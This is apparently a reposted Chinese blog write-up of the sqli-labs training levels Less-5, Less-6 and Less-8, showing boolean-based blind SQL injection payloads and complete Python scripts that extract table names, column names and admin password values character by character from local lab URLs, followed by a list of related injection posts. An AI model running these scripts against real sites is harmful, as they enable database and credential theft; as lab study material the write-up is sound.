2. 程式人生 > 其它 >SQL-labs布林注入

SQL-labs布林注入

阿新 發佈:2021-08-08

Less-5

  1. 確定注入點

  2. 對注入點測試獲取原始注入利用工具

    • 由此可以看出是字元型注入需要閉合引號

    檢視正確和不正確的情況

    正確:

    不正確:

  3. Python程式碼編寫自動化注入

    構造:

    檢視資料表:

    -1'/**/or/**/mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),1,1)='a

    # 獲取資料庫中資料表名稱
print("資料表為:")
for n in range(0,4):
	table_name = ''
	for i in range(1,20):
		for char in chars:
			params={
			"id":"-1'or/**/mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/"+str(n)+",1),"+str(i)+",1)='"+str(char)
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			if len(r.text) == 704:
				table_name += char
	print(table_name)

    檢視欄位名:

    -1'/**/or/**/mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='admin'/**/limit/**/0,1),1,1)='a

    # 獲取欄位名
print("表中欄位名為:")
for x in range(0,10):
	column_name=''
	for m in range(1,20):
		for char in chars:
			params={
				"id":"-1'or/**/mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='admin'/**/limit/**/"+str(x)+",1),"+str(m)+",1)='"+str(char)
			}
			l=requests.get(url=url,params=params)
			# print(len(l.text))
			# print(l.request.url)
			if len(l.text)==704:
				column_name += char
	if(len(column_name)!=0):
		print(column_name)

    檢視admin表中password的內容

    -1'or/**/mid((select/**/password/**/from/**/admin/**/limit/**/0,1),1,1)='f

    # 獲取內容
print("內容為:")
for n in range(0,10):
	password_value = ''
	for i in range(1,50):
		for char in chars:
			params={
				"id":"-1'or/**/mid((select/**/password/**/from/**/admin/**/limit/**/"+str(n)+",1),"+str(i)+",1)='"+str(char)
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			if len(r.text)==704:
				password_value += char
	print(password_value)

  4. 完整的python程式碼:

    import requests

chars="}{-0123456789qwertyuiopasdfghjklzxcvbnm"
url="http://sql-liab/Less-5/index.php"

# 獲取資料庫中資料表名稱
print("資料表為:")
for n in range(0,4):
	table_name = ''
	for i in range(1,20):
		for char in chars:
			params={
			"id":"-1'or/**/mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/"+str(n)+",1),"+str(i)+",1)='"+str(char)
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			if len(r.text) == 704:
				table_name += char
	print(table_name)
# 獲取欄位名
print("表中欄位名為:")
for x in range(0,10):
	column_name=''
	for m in range(1,20):
		for char in chars:
			params={
				"id":"-1'or/**/mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='admin'/**/limit/**/"+str(x)+",1),"+str(m)+",1)='"+str(char)
			}
			l=requests.get(url=url,params=params)
			# print(len(l.text))
			# print(l.request.url)
			if len(l.text)==704:
				column_name += char
	if(len(column_name)!=0):
		print(column_name)


# 獲取內容
print("內容為:")
for n in range(0,10):
	password_value = ''
	for i in range(1,50):
		for char in chars:
			params={
				"id":"-1'or/**/mid((select/**/password/**/from/**/admin/**/limit/**/"+str(n)+",1),"+str(i)+",1)='"+str(char)
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			if len(r.text)==704:
				password_value += char
	if(len(password_value)!=0):
		print(password_value)

  5. 程式碼審計階段:

Less-6

  1. 判斷注入型別

    -1"
    • 需要閉合雙引號

  2. 構造:

    import requests

url="http://sql-liab/Less-6/index.php"
chars="qwertyuiop{}asdfghjklzxcvbnm1234567890-"

# 獲得表名
print("表名為:")
for n in range(0,5):
	table_name = ""
	for m in range(1,20):
		for char in chars:
			params={
				"id":'-1"/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/'+str(n)+',1),'+str(m)+',1))='+str(ord(char))+'#'
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			# print(len(r.text))
			if len(r.text)== 702:
				table_name += char
	if len(table_name) != 0:
		print(table_name)

# 獲得欄位名
print("欄位為:")
for n in range(0,10):
	column_name= ''
	for m in range(1,20):
		for char in chars:
			params={
				"id":'-1"/**/or/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=0x61646D696E/**/limit/**/'+str(n)+',1),'+str(m)+',1))='+str(ord(char))+'#'
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			if(len(r.text))==702:
				column_name += char
	if len(column_name)!=0:
		print(column_name)
# 獲得內容
print("flag為:")
for n in range(0,10):
	password_value=''
	for m in range(1,50):
		for char in chars:
			params={
				"id":'-1"/**/or/**/ord(mid((select/**/password/**/from/**/admin/**/limit/**/'+str(n)+',1),'+str(m)+',1))='+str(ord(char))+'#'
			}
			r=requests.get(url=url,params=params)
			# print(r.request.url)
			if len(r.text)==702:
				password_value += char
	if len(password_value)!=0:
		print(password_value)

  3. 程式碼審計

Less-8

  1. 判斷注入型別

    1' and 1=1--+

  2. python自動化注入編寫

    mport requests

url="http://localhost/Less-8/"
chars="}{134567890-qwertyuiopasdfghjklzxcvbnm"

# 706
#獲取表名
for n in range(0,10):
	table_name=""
	for m in range(1,20):
		for char in chars:
			params={
				"id":"1'and/**/mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/"+str(n)+",1),"+str(m)+",1)='"+str(char)+"'#"
			}
			r=requests.get(url=url,params=params)
			# print(len(r.text))
			# print(r.request.url)
			if len(r.text)==706:
				table_name +=char
	if len(table_name)!=0:
		print(table_name)


# 獲取欄位
for n in range(0,10):
	column_name= ""
	for m in range(1,20):
		for char in chars:
			params={
				"id":"1'and/**/mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='admin'/**/limit/**/"+str(n)+",1),"+str(m)+",1)='"+str(char)+"'#"
			}
			r=requests.get(url=url,params=params)
			# print(len(r.text))
			# print(r.request.url)
			if len(r.text)==706:
				column_name +=char
	if len(column_name)!=0:
		print(column_name)

# 獲取字元
for n in range(0,10):
	password_value=""
	for m in range(1,50):
		for char in chars:
			params={
				"id":"1'and/**/mid((select/**/password/**/from/**/admin/**/limit/**/"+str(n)+",1),"+str(m)+",1)='"+str(char)+"'#"
			}
			r=requests.get(url=url,params=params)
			# print(len(r.text))
			# print(r.request.url)
			if len(r.text)==706:
				password_value +=char
	if len(password_value)!=0:
		print(password_value)

  3. 程式碼審計

相關推薦

SQL-labs布林注入

Less-5 確定注入點 對注入點測試獲取原始注入利用工具 由此可以看出是字元型注入需要閉合引號

sql-labs-less26|sql注入

前言: 本關為sql注入系列第16關,此係類持續更新中,前面關卡可以參考此係列其他文章,如有錯誤的地方歡迎師傅指正,請看正文:

sql-labs-less32/less33|sql注入

前言: 由於less29-less31關需要使用JspStudy,但是官網的版本不支援Windows10環境(是我太菜,之前在XP虛擬機器搭建DVWA環境就搞不好),所以直接跳過了。本關為sql-labs系列less32和less33,此係列持續更

sqli-labs個人注入心得

閉合方式型別都有一般是’,\",或 無閉合符號 或 \'),\") Less-1 嘗試?id=1 註釋符號為–+、-- 、#。

攻防世界-web-unfinish(sql二次注入

題目來源:網鼎杯 2018題目描述:SQL 題目如下,是個登入頁面 通過awvs掃描得知存在register.php註冊頁面,並且註冊介面存在SQL盲注漏洞。

攻防世界-web-comment(密碼爆破、.git洩漏、程式碼審計、sql二次注入

題目來源:網鼎杯 2018題目描述:SQL 一、密碼爆破 進入場景後,點擊發帖,輸入內容提交後,系統返回登入頁面

Web滲透測試|SQL報錯注入

歡迎點選「演算法與程式設計之美」↑關注我們! 本文首發於微信公眾號:"演算法與程式設計之美",歡迎關注,及時瞭解更多此係列文章。

Hack World和CTFHub布林注入記錄

Hack World 題目直接告訴你flag在flag表中的flag列 只有一個提交框,正常方法無法注入,已經過濾大部分的sql語句。

sql 報錯注入

技術標籤:web安全 sql報錯注入 ​ 報錯注入就是利用了資料庫的某些機制,人為地製造錯誤條件,使得查詢結果能夠出現在錯誤資訊中。

sql報錯注入:extractvalue、updatexml報錯原理

sql報錯注入:extractvalue、updatexml報錯原理 Published on 2019-03-07 11:58 in 分類: sql注入 with 老夏家的部落格

[極客大挑戰 2019]HardSQL 1-SQL報錯注入

SQL注入-報錯注入 [極客大挑戰 2019]HardSQL 試題地址:http://94d112f4-9aed-4f3e-b2ff-0c98f30a81b9.node4.buuoj.cn/

sql-labs:less-17

輸錯密碼,就來這一套 進行程式碼審計 <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">

SQL報錯注入

報錯注入在沒法用union聯合查詢時用,但前提還是不能過濾一些關鍵的函式。

SQL-LABS

SQL-LABS之旅,已經不是第一次做了,但是還是時常忘記一些東西,查來查去的挺麻煩,不如重新來一遍,這一遍就記好筆記。

SQL-報錯注入

updatexml報錯注入 updatexml (XML_document, XPath_string, new_value): 第一個引數:XML_document是String格式,為XML文件物件的名稱,文中為Doc

sqli-labs學習sql注入

sqli-labs的安裝和配置 下載sqli-labs和phpstudy(注意PHP study版本不能高於8.0,不然容易出錯,本人就是PHP study版本高了,一直出錯)

SQL注入布林盲註腳本

在做ctf時,我們會碰到很多的SQL注入的題目,可能會有各種各樣的過濾,有時候sqlmap會無法滿足我們的需求,無法繞過各種各樣的注入,所以我們需要手寫盲註腳本來對注入點進行注入,自己寫指令碼的好處就是我們可以根

END的學習 SQL注入繞過 and POST基於時間和布林的盲注

SQL注入繞過 1,大小寫繞過 2,雙寫繞過 3,編碼繞過 可以使用URL編碼,ASCII,HEX,unicode編碼繞過

SQLi-LABS 第一關 SQL注入 總結

SQLi-LABS 第一關 SQL注入 總結 關卡簡介 關卡提示:GET-Error based- Single quotes-String 注入位置:GET

Sqli-labs 第2關 SQL注入 Writeup

Sqli-labs 第2關 SQL注入 Writeup 關卡簡介 關卡提示:GET-Error based - Intiger based 注入位置:GET